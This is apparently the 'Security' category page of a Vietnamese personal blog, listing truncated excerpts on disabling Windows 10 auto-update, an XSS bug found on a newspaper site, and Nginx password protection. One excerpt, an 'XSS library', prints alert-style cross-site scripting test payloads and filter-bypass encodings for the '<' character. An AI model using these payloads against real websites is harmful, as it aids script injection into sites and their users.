Chuyên mục: Security

Làm thế nào để tắt Auto Update của Windows 10 ?

Chức năng tự động update của Windows 10 khá hay khi nó có thể tự động cập nhật lên phiên bản mới nhất ngay sau khi Microsoft thêm hoặc tùy chỉnh phiên bản. Điều này mới nghe qua thì có vẻ như giúp ích rất nhiều cho người dùng như các vấn đề về bảo […]

Thư viện XSS (By Pass + Exploit)

Một số dòng script test cơ bản. <script>alert(“XSS”);</script> <script>alert(String.fromCharCode(88, 83, 83))</script> “><script>alert(“XSS”);</script> By Pass Chrome <script>void(“&b=”)%3Balert(123)%3B<%2Fscript> <script>void(‘&b=’);alert(‘XSS’);</script>     By Pass cái dấu “<“ %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c […]

Tôi đã hack báo Tuổi Trẻ như thế nào.

Làm cái tít cho giựt gân vậy chơi thôi, chứ thiệt ra chỉ có cái lỗi XSS nhỏ xíu à. và cũng không tự hào gì khi phát hiện ra lỗi của báo Tuổi Trẻ, vì trước mình đã có nhiều người phát hiện ra lỗi này. Đến khi mình thông báo là: “Tôi phát hiện […]

Đặt mật khẩu bảo vệ File và Folder trong Nginx

Với WordPress thông thường chúng ta hay bảo vệ thư mực wp-admin và file wp-login.php Bước 1: Tạo file chứa user và mật khẩu được mã hóa. htpasswd -c /home/nginx/domains/websitecuaban.com/public/.htpasswd username password với câu lệnh trên hệ thống sẽ tạo 1 file .htpasswd trong thư mục gốc /home/nginx/domains/websitecuaban.com/public/ Hoặc bạn cũng có thể vào: https://www.htaccesstools.com/htpasswd-generator/ để tạo thủ […]

Trang 1 trên 212
Tăng Dương Triều © 2017